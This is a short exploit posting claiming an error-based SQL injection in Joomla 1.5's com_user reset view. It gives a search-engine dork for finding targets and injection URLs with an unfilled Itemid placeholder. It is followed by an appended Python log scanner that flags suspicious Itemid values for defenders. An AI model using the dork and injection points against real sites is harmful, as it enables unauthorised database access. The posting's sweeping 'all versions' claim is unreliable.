**Joomla all v1.5 Error Based SQL Injection Vulnerability**
//...Leaked bY Anon Leaker..//
//..12.12.2012..//
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
I'm Caddy-dz, member from Inj3ct0r Team
####
# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Category: webapps
# script home : http://joomla.com
# Dork : inurl:option=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# This was written for educational purposes only. Use it at your own risk.
# The author will not be responsible for any damage caused! The user assumes all responsibility.
# Intended for authorized web application pentesting only!
// Description :
The affected component is /com_user/ in all Joomla v1.5.
P.S.: you can find the version by opening the source code of the target and searching for "joomla"; you'll see the version :-)
// Exploit :
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection) [replacing the id number with a character]
# Private YouTube link, only people who have the link can view it: http://www.youtube.com/watch?v=g0QcjxIb68I
// Demo :
SQL injection in Joomla 1.5 :)
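For defenders, a log check for the request pattern described above, added here as an example and not part of the original advisory: it flags com_user requests whose Itemid is not a plain integer. The log lines are constructed, and the access-log layout and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of an access-log line: "METHOD target PROTOCOL" (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2012:10:00:01 +0000] "GET /index.php?option=com_user&view=reset&lang=en&Itemid=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Dec/2012:10:00:05 +0000] "GET /index.php?option=com_user&view=reset&lang=en&Itemid=1\' HTTP/1.1" 500 812',
    '198.51.100.7 - - [12/Dec/2012:10:00:06 +0000] "GET /index.php?option=com_user&view=reset&Itemid=%27 HTTP/1.1" 500 812',
    '192.0.2.10 - - [12/Dec/2012:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=5&Itemid=2 HTTP/1.1" 200 9000',
    '198.51.100.7 - - [12/Dec/2012:10:00:11 +0000] "GET /index.php?option=com_user&view=reset&lang=en&Itemid=x HTTP/1.1" 500 700',
]


def suspicious_itemid(target):
    """Return the decoded Itemid if a com_user request carries a non-integer one."""
    query = parse_qs(urlsplit(target).query)  # also decodes %27, + and similar
    if "com_user" not in query.get("option", []):
        return None
    for value in query.get("Itemid", []):
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None


def scan(lines):
    """Return (line number, client address, Itemid value) for each flagged line."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = suspicious_itemid(match.group(1))
        if value is not None:
            hits.append((lineno, line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for lineno, client, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent Itemid={value!r} to com_user")
```

The same integer-only rule can be enforced in front of the application (for example in a WAF or rewrite rule) while the site is moved off Joomla 1.5.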